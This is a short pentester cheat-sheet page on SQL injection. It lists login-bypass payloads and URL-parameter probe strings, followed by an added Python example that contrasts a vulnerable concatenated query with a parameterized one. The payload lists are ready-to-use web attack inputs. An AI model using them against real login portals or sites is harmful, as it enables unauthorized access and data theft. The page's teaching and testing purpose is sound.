burmat / nathan burchfield

SQL Injection (SQLi)

Quick-Hitters

Login Portals

admin' or '1'='1
" or ""="
' or 1=1 -- -
' union select 1,2,3 -- -
admin'-- -
' or "-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or 1=1 or "='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
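
Why these entries get past a login form, and why bound parameters stop them: the block below is an added example (not from the original page) that runs a few of the listed strings against a constructed SQLite `users` table, once through a string-concatenated query and once through a parameterized one. The table, the credentials and the function names are assumptions made for the illustration.

```python
import sqlite3

# Constructed sample data; a real system stores a salted password hash.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return conn

def login_concatenated(conn, username, password):
    # Vulnerable pattern: input is spliced into the SQL text, so a quote
    # in the input ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()

def login_parameterized(conn, username, password):
    # Hardened pattern: placeholders keep input as data, never as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()

def outcome(login, conn, username, password="wrong"):
    try:
        return "logged in" if login(conn, username, password) else "denied"
    except sqlite3.Error:
        # A syntax error caused by user input is itself evidence of
        # injection and worth alerting on.
        return "sql error"

# Entries copied from the Login Portals list above.
PAGE_ENTRIES = ["admin' or '1'='1", "admin'-- -", "' or 1=1 -- -",
                '" or ""="', "admin' #"]

def compare():
    conn = make_db()
    return {e: (outcome(login_concatenated, conn, e),
                outcome(login_parameterized, conn, e)) for e in PAGE_ENTRIES}

if __name__ == "__main__":
    for entry, (weak, hardened) in compare().items():
        print(f"{entry!r:22} concatenated={weak:10} parameterized={hardened}")
```

The `" or ""="` entry is inert here only because this query quotes with `'`, and `admin' #` errors because SQLite has no `#` comment; both depend on the quoting style and dialect of the target query, while the parameterized form denies every entry regardless.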

URL Parameters

For https://site.com/?q=HERE

/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||'   <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='

Last updated 7 months ago